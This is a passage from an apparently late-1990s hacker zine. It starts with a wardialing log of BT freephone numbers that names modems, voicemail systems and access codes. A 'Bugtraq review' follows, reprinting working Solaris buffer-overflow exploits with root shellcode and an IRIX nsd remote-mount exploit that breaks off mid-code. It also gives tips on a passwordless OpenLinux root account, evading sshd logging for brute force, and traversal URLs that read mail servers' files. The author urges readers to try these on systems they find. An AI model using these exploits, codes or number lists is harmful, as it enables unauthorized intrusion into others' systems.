545 - rang
546 - fax
547 - voice
548 - rang
549 - rang
550 - Hillsdown help desk, OPtions
551 - fax
552 - BT phoneBook supply
553 - rang
554 - work manager edinbough
555 - work manager edinbough
556 - work manager edinbough
557 - work manager edinbough
558 - rang
559 - more work manager stuff
560 - rang
561 - telecom sales desk
562 - telecom sales desk
563 - telecom sales desk
564 - telecom sales desk
565 - telecom sales desk } they supply BT with hardware
566 - telecom sales desk
567 - telecom sales desk
568 - telecom sales desk
569 - telecom sales desk
570 -
571 - cambridge service management centre
572 -
573 - cambridge service management centre
574 - cambridge service management centre
575 - cambridge service management centre
576 - cambridge service management centre
577 - cambridge service management centre
578 - cambridge service management centre
579 - cambridge service management centre
580 - rang
581 - cambridge service management centre
582 -
583 - cambridge service management centre
584 - cambridge service management centre
585 - cambridge service management centre
586 - cambridge service management centre
587 - voice
588 - cambridge service management centre
589 - edinbrough service management centre
590 - rang
591 - edinbrough service management centre
592 - cambridge service management centre
593 - rang
594 -
595 - rang
596 -
597 - fax
598 - fax
599 - fax
600 - BT security 0800321999 * nasty *
Rang = boring fucking wankers
0800 990088 = whats the fucking point?
neat-o = werd (oh fuck, tell i been using IRC!)
the nothings = bollox, just fucking bollox.
other = god gave us the phone for something, and it aint phone
shags
carrier = YERRR.
voice = I hate getting though to voice, always phreaks me! :)
-------------------------------------------------------------------------------
0800-672-328
User Access Verification
Login:guest
Password:
% Authentication failed.
===============================================================================
0800-672-393
WARNING: You are about to access a
controlled system. You are required to
have a personal authorisation to use this
system and you are strictly limited to the
use set out in that written authorisation.
Unauthorised access to or misuse of this
system is prohibited and constitutes an
offence under the Computer Misuse Act 1990.
Only proceed if you are authorised to use
this system as detailed above.
02:Login:
===============================================================================
0800 672 600 [BT security. 0800 321 999]
0800 672 601 [dead]
0800 672 602 [modem/fax]
0800 672 603 [modem/fax]
0800 672 604 [no answer]
0800 672 605 [no answer]
0800 672 606 [strange, no ring then internal dead tone]
0800 672 607 [same]
0800 672 608 [dead]
0800 672 609 [internal dead tone]
0800 672 610 [BT residential customer accounts service, recording]
0800 672 611 [dead]
0800 672 612 [BT residential customer accounts service]
0800 672 613 [dead]
0800 672 614 [dead]
0800 672 615 [no answer]
0800 672 616 [dead]
0800 672 617 [dead]
0800 672 618 [no answer]
0800 672 619 [no answer]
0800 672 620 [re-routed, cell-phone?]
0800 672 621 [re-routed, cell-phone?]
0800 672 622 [re-routed, cell-phone?]
0800 672 623 [re-routed, cell-phone?]
0800 672 624 [re-routed, cell-phone?]
0800 672 625 [re-routed, cell-phone?]
0800 672 626 [re-routed, cell-phone?]
0800 672 627 [re-routed, cell-phone?]
0800 672 628 [re-routed, cell-phone?]
0800 672 629 [re-routed, cell-phone?]
0800 672 630 [re-routed, cell-phone?]
0800 672 631 [re-routed, cell-phone?]
0800 672 632 [re-routed, cell-phone?]
0800 672 633 [dead]
0800 672 634 [dead]
0800 672 635 [London Meridian Operations Center. Meridian Mail, hehe.
0800 672 636 [BT voice messaging, *massive* voicemail network.login number]
0800 672 637 [BT voice messaging, leave a message number]
0800 672 638 [no answer]
0800 672 639 [no answer]
0800 672 640 [dead]
0800 672 641 [dead]
0800 672 642 [dead]
0800 672 643 [no answer]
0800 672 644 [dead]
0800 672 645 [dead]
0800 672 646 [dead]
0800 672 647 [dead]
0800 672 648 [dead]
0800 672 649 [dead]
0800 672 650 [re-routed, BT somthing, stupid bitch is to quiet, ans-phone]
0800 672 651 [re-routed, Corpertate line service center, answerphone]
0800 672 652 [no answer]
0800 672 653 [BT customer service center, recording]
0800 672 654 [BT local goverment]
0800 672 655 [no answer]
0800 672 656 [no answer]
0800 672 657 [no answer]
0800 672 658 [BT local government]
0800 672 659 [no answer]
0800 672 660 [telecoms sales desk recording]
0800 672 661 ["]
0800 672 662 ["]
0800 672 663 ["]
0800 672 664 ["]
0800 672 665 ["]
0800 672 666 ["]
0800 672 667 ["]
0800 672 668 ["]
0800 672 669 ["]
0800 672 670 [no answer]
0800 672 671 [very strange, emits a tone, responds to DTMFs]
0800 672 672 [no answer]
0800 672 673 [dead]
0800 672 674 [dead]
0800 672 675 [modem/fax]
0800 672 676 [no answer]
0800 672 677 [no answer]
0800 672 678 [not recognised]
0800 672 679 [modem/fax]
0800 672 680 [dead]
0800 672 681 [BT number information line, * 2 digit passcode..]
0800 672 682 [dead]
0800 672 683 [no answer]
0800 672 684 [no answer]
0800 672 685 [busy]
0800 672 686 [no answer]
0800 672 687 [no answer]
0800 672 688 [not recognised]
0800 672 689 [no answer]
0800 672 690 [dead]
0800 672 691 [BT number information unit]
0800 672 692 [dead]
0800 672 693 [no answer]
0800 672 694 [no answer]
0800 672 695 [no answer]
0800 672 696 [no answer]
0800 672 697 [no answer]
0800 672 698 [no answer]
0800 672 699 [dead]
0800 672 700 [modem/fax]
0800 672 701 [re-routed, ans phone, * 3 digit sec code]
0800 672 702 [dead]
0800 672 703 [dead]
0800 672 704 [dead]
0800 672 705 [no answer]
0800 672 706 [dead]
0800 672 707 [Cellnet callback mesaging service]
0800 672 708 ["]
0800 672 709 [no answer]
0800 672 710 [no answer]
0800 672 711 ["hi, Birmingham"]
0800 672 712 [BT network services]
0800 672 713 [not rec]
0800 672 714 [not rec]
0800 672 715 [CIST]
0800 672 716 [not rec]
0800 672 717 [modem]
0800 672 718 [not rec]
0800 672 719 [no answer]
0800 672 720 [no answer]
0800 672 721 [dead]
0800 672 722 [no answer]
0800 672 723 [somthing managment center]
0800 672 724 [no answer]
0800 672 725 [dead]
0800 672 726 [not rec]
************************************************************************
0800 672 727 [BT payphone automatic fault reporting system. For BT
engineer dudes to request maintanance etc on payphones,
requires 2 digit code (11) also fault code (10) etc]
************************************************************************
0800 672 728 [no answer]
0800 672 729 [BT buisness connections]
0800 672 730 [Telecom red sales desk]
0800 672 731 ["]
0800 672 732 ["]
0800 672 733 ["]
0800 672 734 ["]
0800 672 735 ["]
0800 672 736 ["]
0800 672 737 ["]
0800 672 738 ["]
0800 672 739 ["]
0800 672 740 [no answer]
0800 672 741 [not rec]
0800 672 742 [dead]
0800 672 743 [no answer]
0800 672 744 [no answer]
0800 672 745 [no answer]
0800 672 746 [no answer]
0800 672 747 [no answer]
0800 672 748 [no answer]
0800 672 749 [no answer]
0800 672 750 [no answer]
0800 672 751 [dead]
0800 672 752 [answerphone]
0800 672 753 [dead]
0800 672 754 [production control team]
0800 672 755 [dead]
0800 672 756 [modem/fax]
0800 672 757 [dead]
0800 672 758 [not rec]
0800 672 759 [no answer]
0800 672 760 [dead]
0800 672 761 [BT residential repair service]
0800 672 762 [performance somthing]
0800 672 763 [dead]
0800 672 764 [dead]
0800 672 765 [dead]
0800 672 766 [dead]
0800 672 767 [dead]
0800 672 768 [dead]
0800 672 769 [dead]
0800 672 770 [BT buisness center]
0800 672 771 [no answer]
0800 672 772 [Cellnet direct]
0800 672 773 [0800 550 811 - changed]
0800 672 774 [modem/fax]
0800 672 775 [dead]
0800 672 776 [no answer]
0800 672 777 [HR and DS]
0800 672 778 [BT residential repair service]
0800 672 779 [direct to some womans Meridian Mail vmb. *81]
0800 672 780 [no answer]
************************************************************************
0800 672 781 [HR and DS - !WARNING! - this is strange, on both these
numbers it is not possible to terminate your call.
Somhow the line is held open]
************************************************************************
0800 672 782 [not rec]
0800 672 783 [no answer]
0800 672 784 [no answer]
0800 672 785 [no answer]
0800 672 786 [no answer]
0800 672 787 [no answer]
0800 672 788 [no answer]
0800 672 789 [no answer]
0800 672 790 [BT residential customer accounts service]
0800 672 791 [answerphone]
0800 672 792 [answerphone]
0800 672 793 [no answer]
0800 672 794 [no answer]
0800 672 795 [answerphone]
0800 672 796 [no answer]
0800 672 797 [no answer]
0800 672 798 [BT fax service. Meridian switch]
0800 672 799 [BT fax sercvie]
0800 672 800 [busy]
0800 672 801 [dead]
0800 672 802 [dead]
0800 672 803 [dead]
0800 672 804 [dead]
0800 672 805 [dead]
0800 672 806 [dead]
0800 672 807 [dead]
0800 672 808 [dead]
0800 672 809 [dead]
0800 672 810 [southapton buisness center]
0800 672 811 [BT corperate clients]
0800 672 812 [horsham center]
0800 672 813 [no answer]
0800 672 814 [no answer]
0800 672 815 [horsham buisness center]
0800 672 816 [no answer]
0800 672 817 [horsham center]
0800 672 818 [no answer]
0800 672 819 [no answer]
0800 672 820 [no answer]
0800 672 821 [no answer]
0800 672 822 [horsham center]
0800 672 823 [no answer]
0800 672 824 [no answer]
0800 672 825 [BT service center]
0800 672 826 [BT buisness center]
0800 672 827 [carrier]
0800 672 828 [not recognised]
0800 672 829 [no answer]
0800 672 830 [BT residential repair service]
0800 672 831 [dead]
0800 672 832 [dead]
0800 672 833 [dead]
0800 672 834 [dead]
0800 672 835 [no answer]
0800 672 836 [no answer]
0800 672 837 [no answer]
0800 672 838 [hello]
0800 672 839 [no answer]
0800 672 840 [6777 robert speaking]
0800 672 841 [no answer]
0800 672 842 [network managemnt center]
0800 672 843 [no answer]
0800 672 844 [dead]
0800 672 845 [BT voice-messaging]
0800 672 846 [BT voice-messaging]
0800 672 847 [no answer]
0800 672 848 [no answer]
0800 672 849 [no answer]
0800 672 850 [can i have the number you are reporting please?]
0800 672 851 [dead]
0800 672 852 [dead]
0800 672 853 [dead]
0800 672 854 [dead]
0800 672 855 [no answer]
0800 672 856 [nothing, then dead]
0800 672 857 [modem]
0800 672 858 [dead]
0800 672 859 [dead]
0800 672 860 [dead]
0800 672 861 [strange, internal dead tone]
0800 672 862 [not available]
0800 672 863 [hallo]
0800 672 864 [no answer]
0800 672 865 [modem]
0800 672 866 [no answer]
0800 672 867 [dead]
0800 672 868 [dead]
0800 672 869 [no answer]
0800 672 870 [telecom red sales desk]
0800 672 871 ["]
0800 672 872 ["]
0800 672 873 ["]
0800 672 874 ["]
0800 672 875 ["]
0800 672 876 ["]
0800 672 877 ["]
0800 672 878 ["]
0800 672 879 ["]
0800 672 880 [dead]
0800 672 881 [somthing buisness center]
0800 672 882 ["]
0800 672 883 ["]
0800 672 884 ["]
0800 672 885 [dead]
0800 672 886 [?]
0800 672 887 [modem]
0800 672 888 [dead]
0800 672 889 [dead]
0800 672 890 [dead]
0800 672 891 [no answer]
0800 672 892 [answerphone]
0800 672 893 [BT fax - BT-3]
0800 672 894 [answerphone]
0800 672 895 [answerphone]
0800 672 896 [answerphone]
0800 672 897 [BT fax service center]
0800 672 898 [This system will connect you to a BT office of your choice]
0800 672 899 [modem]
0800 672 900 [telecom red]
0800 672 901 ["]
0800 672 902 ["]
0800 672 903 ["]
0800 672 904 ["]
0800 672 905 ["]
0800 672 906 ["]
0800 672 907 ["]
0800 672 908 ["]
0800 672 909 ["]
0800 672 910 [business solutions]
0800 672 911 [no answer]
0800 672 912 [no answer]
0800 672 913 [no answer]
0800 672 914 [no answer]
0800 672 915 [no answer]
0800 672 916 [no answer]
0800 672 917 [no answer]
0800 672 918 [no answer]
0800 672 919 [no answer]
0800 672 920 [no answer]
0800 672 921 [query line]
0800 672 922 [no answer]
0800 672 923 [no answer]
0800 672 924 [no answer]
0800 672 925 [no answer]
0800 672 926 [no answer]
0800 672 927 [no answer]
0800 672 928 [no answer]
0800 672 929 [no answer]
0800 672 930 [dead]
0800 672 931 [no answer]
0800 672 932 [dead]
0800 672 933 [not recoginised]
0800 672 934 [hello, it's john]
0800 672 935 [no answer]
0800 672 936 [no answer]
0800 672 937 [southampton business center]
0800 672 938 [no answer]
0800 672 939 [no answer]
0800 672 940 [dead]
0800 672 941 [dead]
0800 672 942 [dead]
0800 672 943 [dead]
0800 672 944 [dead]
0800 672 945 [dead]
0800 672 946 [dead]
0800 672 947 [dead]
0800 672 948 [dead]
0800 672 949 [dead]
0800 672 950 [dead]
0800 672 951 [modem]
0800 672 952 [no answer]
0800 672 953 [modem]
0800 672 954 [no answer]
0800 672 955 [modem]
0800 672 956 [no answer]
0800 672 957 [modem]
0800 672 958 [no answer]
0800 672 959 [no answer]
0800 672 960 [no answer]
0800 672 961 [BT work manager center]
0800 672 962 [no answer]
0800 672 963 [BT workmanager center]
0800 672 964 [no answer]
0800 672 965 [BT workmanager center]
0800 672 966 ["]
0800 672 967 [no answer]
0800 672 968 [no answer]
0800 672 969 [no answer]
0800 672 970 [dead]
0800 672 971 [no answer]
0800 672 972 [no answer]
0800 672 973 [no answer]
0800 672 974 [no answer]
0800 672 975 [no answer]
0800 672 976 [no answer]
0800 672 977 [no answer]
0800 672 978 [no answer]
0800 672 979 [no answer]
0800 672 980 [no answer]
0800 672 981 [no answer]
0800 672 982 [no answer]
0800 672 983 [no answer]
0800 672 984 [dead]
0800 672 985 [Meridian mail]
0800 672 986 [no answer]
0800 672 987 [no answer]
0800 672 988 [no answer]
0800 672 989 [dead]
0800 672 990 [no answer]
0800 672 991 [modem]
0800 672 992 [dead]
0800 672 993 [not recognised]
0800 672 994 [no answer]
0800 672 995 [no answer]
0800 672 996 [no answer]
0800 672 997 [no answer]
0800 672 998 [no answer]
0800 672 999 [no answer]
**********
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ SUIDcyde ]:::::::::::::[OO--[ by bodie ]---[ bodi3@usa.net ]:::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Bugtraq review
---------
*NOTE*
all these bugs have not been varified by me, use them at your own risk
---------
been an interesting time recently on bugtraq. A was found in IE4 which means
that if someone tries to bookmark your site, they will not be able to access
their browser any more
The bug works because IE5 tries to download a file called favicon.ico from
the a web site when a user bookmarks it. It uses this icon to display next
to the site in the faverites list. The bug works when the file isn't of the
correct format, IE5 crashes :)
This means you can stop all those script kiddies from bookmarking your site
by putting a file called favicon.ico (just open up a t-file and write hello
or something) This will encourage some people to use netscape and generally
piss off microshaft. And the best part is, it's totally legal :)
---
Another bug that was revealed was in the installation program for openlinux
2.2. The problem lies in that, when it installs it inserts a user in the
password file called 'help'. This account is meant to be used to rescue the
system if it crashes during installation. Why they don't just use root i
don't know, but the account stays there after installation with root privs
and no password. So if ya see any OL systems around try that out. I've
seen 1 so far and it worked like a dream (of course i notified the sysadmin
of it straight away :))
---
Yet more buffer overflows, this one for dtprintinfo, root. This exploit code
works on Intel edition of Solaris2.6 and Solaris 2.7, you may have to fiddle
with the code to get it working on other versions. To get it working you
will have to type this first
/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
========================================================================
*/
static char x[1000];
#define ADJUST 0
#define STARTADR 621
#define BUFSIZE 900
#define NOP 0x90
unsigned long ret_adr;
int i;
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}
main()
{
putenv("LANG=");
for (i=0;i<BUFSIZE;i++) x[i]=NOP;
for (i=0;i<strlen(exploit_code);i++)
x[STARTADR+i]=exploit_code[i];
ret_adr=get_sp() - 1292 + 148;
for (i = ADJUST; i < 400 ; i+=4){
x[i+0]=ret_adr & 0xff;
x[i+1]=(ret_adr >> 8 ) &0xff;
x[i+2]=(ret_adr >> 16 ) &0xff;
x[i+3]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE]=0;
execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
"-p",x,(char *) 0);
}
---
another exploit is in the lpset command. This goes sorta like this
/*===================================================================
ex_lpset.c Overflow Exploits( for Intel Edition )
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
=====================================================================
*/
#define OFFSET 0x3b88
#define STARTADR 700
#define ENDADR 1200
#define EX_STADR 8000
#define BUFSIZE 22000
#define NOP 0x90
unsigned long ret_adr;
int i,adjust;
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff\x55"
"\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33\xc0"
"\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e"
"\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3"
"\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46\x08"
"\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01\xe8"
"\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}
static char x[BUFSIZE];
main(int argc, char **argv)
{
memset(x,NOP,18000);
ret_adr=get_sp()-OFFSET;
printf("0 : x86 Solaris2.6 J\n1 : ?\n2 : ?\n3 : x86 Solaris 7 J\n");
printf("Input (0-3) : "); scanf("%d",&adjust);
printf("Jumping Address = 0x%lx\n",ret_adr);
for (i = adjust+STARTADR; i<ENDADR ; i+=4){
x[i+2]=ret_adr & 0xff;
x[i+3]=(ret_adr >> 8 ) &0xff;
x[i+0]=(ret_adr >> 16 ) &0xff;
x[i+1]=(ret_adr >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++)
x[i+EX_STADR]=exploit_code[i];
x[5000]='=';
x[18000]=0;
execl("/usr/bin/lpset","lpset","-n","xfn","-a",x,"lpcol1",(char *) 0);
}
---
Next up we have more problems with sshd. This one allows you to try to brute
force logins to a shell without being detected. Normally you are given 3
attemps to log into an account before you will be disconnected, your IP
logged and e-mail sent to the feds and your ISP. But, if you disconnect after
only 2 attemps, the IP is not logged. If ya ask me brute force on a remote
host is pretty shite to say the least but this is how to do it if ya do wanna
try it
---
A rather nasty vulnerability lies in a program called midikeys, this is a
popular program installed by a lot of sysadmins to play midi files.
Unfortunately it's suid root ...ohh dear... Set your machine as a x-host for
the machine your trying to hack. Now load up midikeys with the display set
to your machine, try to open a text file. Midikeys will be very friendly and
open up a text editor for you which can open any file on the remote system.
---
Solaris 2.6 and 2.7 have a local root but in libc. Goes something like this
/*============================================================
ex_lobc.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security
(http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
============================================================
*/
#define EV "LC_MESSAGES="
#define ADJUST 0
#define OFFSET 5392
#define STARTADR 400
#define NOP 0xa61cc013
#define RETS 600
char x[80000];
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2b\x0b\xda\xdc\xae\x15\x63\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
int i;
unsigned int ret_adr;
main()
{
putenv("LANG=");
memset(x,'x',70000);
for (i = 0; i < ADJUST; i++) x[i]=0x40;
for (i = ADJUST; i < 1000; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx\n",ret_adr);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST+RETS; i < RETS+600; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
memcpy(x,EV,strlen(EV));
x[3000]=0;
putenv(x);
execl("/bin/passwd","passwd",(char *)0);
}
---
A lot of mail servers are now implementing web interfaces. This can be a
problem whe usuffer holes like this. The following programs have these
problems:
CTMail:
type:
http://[server]:8002/../spool/username/mail.txt
into your web browser and you can view the mail of the user
FTGate:
same as above except this seems to be a bit more reliable than the CTMail bug
NTMail:
This is even worse, it allows you to view any file on the system. Type:
http://[server]:8000/../../../../../boot.ini.
and your looking at boot.ini
I'm sure u'll find nice ways of exploiting these bugs
---
Yet more problems with IRIX comes in the nsd virtual file system. This
allows local users to exploit root. Code coming: (sorry about the extended
coments but i decided to include out of respect to the authour)
/******************************************************************************
IRIX 6.5 nsd virtual filesystem exploit
Author: Jefferson Ogata (JO317) <ogata@pobox.com>
Please note that this program comes with NO WARRANTY WHATSOEVER. Your use
of this program constitutes your complete acceptance of all liability for
any damage or loss caused by the aforesaid use. It is provided to the
network community solely to document the existence of a vulnerability
in the security implementations of certain versions of IRIX, and may not
be used for any illicit purpose. Many of the details of the bug this
program exploits have been available to users of SGI's online support
system since February 1999. The current revision of IRIX (6.5.3) corrects
this bug, at least enough to stop this particular exploit, and I strongly
encourage you to bring your systems up to date as quickly as possible.
With IRIX 6.5, SGI has moved all name services, NIS services, and DNS
lookups into a userland process called nsd, which exports the results of
the queries it fields into a virtual filesystem. The virtual filesystem is
normally mounted onto the directory /ns by the program /sbin/nsmount, which
is invoked by nsd on startup. The nsd daemon itself is exporting the
filesystem via NFS3 over a dynamically bound UDP port -- rather than a
well-known or settable one -- typically in the 1024-1029 range. On a
desktop system, 1024 is a good bet, since nsd is usually the first
RPC/UDP service to be started.
The NFS filesystem is not registered with mountd, so there is no way to
query mountd for a mount filehandle. But because the NFS port is fairly
easy to discover through port scanning, and because the mount filehandle
nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd
filesystem from a host anywhere on the Internet. nsd will serve an array
of NFS requests to anyone. Furthermore, because the service's NFS port is
bound dynamically, it is difficult to protect it with a firewall; it may
change from one system start to another, or if the daemon is killed and
restarted.
This program can successfully mount the nsd-exported virtual filesystem
from a remote host onto a machine running IRIX 6.4 or higher. It makes use
of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know
what this flag does at the NFS protocol level, but it allows the client to
ask the NFS server not to enforce certain permissions controls against the
client. I don't know whether any other vendor NFS client systems support
this flag. A clever person might write a userland NFS client that would
accept an initial handle, NFS port, etc. as arguments.
On an SGI with SGI C compiler, compile with:
cc -o nsdadv nsdadv.c
Run it this way:
nsdadv /mnt sucker.example.com 1024
with obvious substitutions.
So what are the security implications of this? Well, at the very least, the
nsd filesystem on an NIS server reveals the NIS domain name, and what maps
it contains, as well as what classes are being used.
By exploring the filesystem shortly after it has been mounted I have been
able to retrieve data that should be hidden from me, including shadow
password entries from a remote system's shadow file.
Beyond retrieving keys and maps, you can also monitor the filesystem for
changes. A great deal of information is leaked through the contents of the
nsd filesystem. For example, if host A looks up a host B's IP address, a
file named B will appear in the /.local/hosts.byname directory in A's nsd
filesystem. The file's contents will be the IP address.
By the way, though you be unable to chdir into a particular location in
the nsd filesystem, you may yet succeed under slightly different
conditions. Eventually you can do it. I'm not sure why or when, but nsd
gets picky sometimes. Eventually it relents. Specifically, I've found that
the entire nsd filesystem appears readable for a few seconds after it is
initially mounted. If you can't look at something, unmount the filesystem,
remount it, and try again immediately. It also seems that a stat() is
sometimes required before a chdir(). Your mileage may vary, but keep
trying. You may wish to write a script to mount the nsd filesystem, explore
and take inventory of its contents, and unmount the filesystem quickly.
Once you've chdir'd into a directory, it appears you can always read it,
although you can't necessarily stat its contents. This suggests a strategy
of spawning a group of processes each with its cwd set to a subdirectory of
the nsd filesystem, in order to retain visibility on the entire filesystem.
Each process would generate an inventory of its cwd, and then monitor it
for changes. A Perl script could do this well.
Another thing: it is possible to create an empty file in nsd's exported
filesystem simply by stat()ing a nonexistent filename. This suggests a
potential DoS by creating many files in a directory.
Remember that the system keeps a local cache in /var/ns, so you may have
to wait for cached entries on the target host to expire before you'll see
them reappear in the virtual filesystem.
For some fairly extensive info on the nsd implementation, take a look at:
http://www.bitmover.com/lm/lamed_arch.html
******
What got me into all this was that I found I could no longer run services
chrooted if they required DNS. It took considerable effort to come up with
a solution to this. This was a fundamental change from IRIX 6.4, and I know
I'm not the only one who finds the nsd implementation to be a generally
unpleasant direction, in part because it causes umount -t nfs to break
system database services. I give SGI points for creativity -- in one sense,
using NFS as a database access system is a very slick approach. But the
database needs a security model, and the model needs to be implemented
correctly. Neither of these needs appears to have been met.
So how could SGI fix this?
Without going back, SGI could at least make nsd respond only to queries
from localhost (see note below about IRIX 6.5.3). The problem here is that
they actually intend to support remote mounts in later releases, in order
to supplement or supplant other means of distribution. The web documents
indicate this.
They could create a well-randomized mount filehandle for the filesystem
and pass that to nsmount. Then you couldn't remotely mount the filesystem
without guessing the handle -- nontrivial with a 32-byte handle.
At the very least, they should provide libraries of regular BIND resolver
routines, file-based getpwent, etc. routines, so one could choose the
resolution strategy at link time, perhaps by modifying the shared library
path.
******
With IRIX release 6.5.3, SGI appears to have fixed this problem, at least
to some degree. The exploit does not appear to work as it does against
6.5.2. Further testing is needed, and the behavior should be watched
carefully in future versions of IRIX.
****************************************************************************/
#include <stdio.h>
#include <string.h>
#include <malloc.h>
#include <mntent.h>
#include <sys/types.h>
#include <rpc/types.h>
#include <sys/fstyp.h>
#include <sys/fsid.h>
#include <sys/mount.h>
#include <sys/fs/nfs.h>
#include <sys/fs/nfs_clnt.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
/* Filesystem type name for nsd-exported filesystem. */
#define NSD_FSTYPE "nfs3"
/* File the records mounted filesystems. */
#define MTAB_FILE "/etc/mtab"
/* Socket address we'll fill in with our destination IP and port. */
struct sockaddr_in sin;
/* All zero file handle. This appears to be the base handle for the nsd
filesystem. Great security, huh? */
unsigned char fh[NFS_FHSIZE] = { 0 };
/* NFS mount options structure to pass to mount(2). The meanings of these
are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The
flags field indicates that this is a soft mount without log messages,
and to set the initial timeout and number of retries from fields in
this structure. The fh field is a pointer to the filehandle of the
mount point, whose size is set by fh_len. As noted above, the mount
point filehandle is just 32 zeroes. */
struct nfs_args nx =
{
&sin, /* addr */
(fhandle_t *) fh, /* fh */
NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC, /* flags */
0, /* wsize */
0, /* rsize */
100, /* timeo */
2, /* retrans */
0, /* hostname */
0, /* acregmin */
0, /* acregmax */
0, /* acdirmin */
0, /* acdirmax */
0, /* symttl */
{ 0 }, /* base */
0, /* namemax */
NFS_FHSIZE, /* fh_len */
/* On IRIX 6.4 and up there are also the following... */
/* bdsauto */
/* bdswindow */
/* On IRIX 6.5 there are also the following... */
/* bdsbuflen */
/* pid */
/* maxthreads */
};
void usage (void)
{
fprintf (stderr, "usage: nsmount_remote directory host port\n\n");
fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on <host> via NSD daemon\n");
fprintf (stderr, "port <port> onto <directory>.\n\n");
exit (1);
}
int main (int argc, char **argv)
{
char *dir;
char *host;
char *ports;
int port;
struct hostent *h;
int fstype;
FILE *mtabf;
struct mntent mnt =
{
0,
0,
NSD_FSTYPE,
"soft,timeo=100,retrans=2",
0,
0,
};
if (argc != 4)
usage ();
dir = argv[1];
host = argv[2];
port = atoi ((ports = argv[3]));
/* Prepare for host lookup. */
memset ((void *) &sin, 0, sizeof (sin));
sin.sin_family = 2;
sin.sin_port = port;
/* Look up the host. */
if (inet_aton (host, &sin.sin_addr))
;
else if ((h = gethostbyname (host)))
{
unsigned long *l = (unsigned long *) *(h->h_addr_list);
sin.sin_addr.s_addr = l[0];
}
else
{
fprintf (stderr, "Cannot resolve host %s.\n", host);
return 1;
}
/* Get filesystem type index for nsd filesystem type. */
if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0)
{
perror ("sysfs (" NSD_FSTYPE ")");
return 1;
}
fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n",
host, inet_ntoa (sin.sin_addr), port, dir);
/* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR
means "tell server to trust us with attributes" and MS_DATA means
"6-argument mount".
MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't
seem to work without this option. So even though this program will
compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to
attack nsd. */
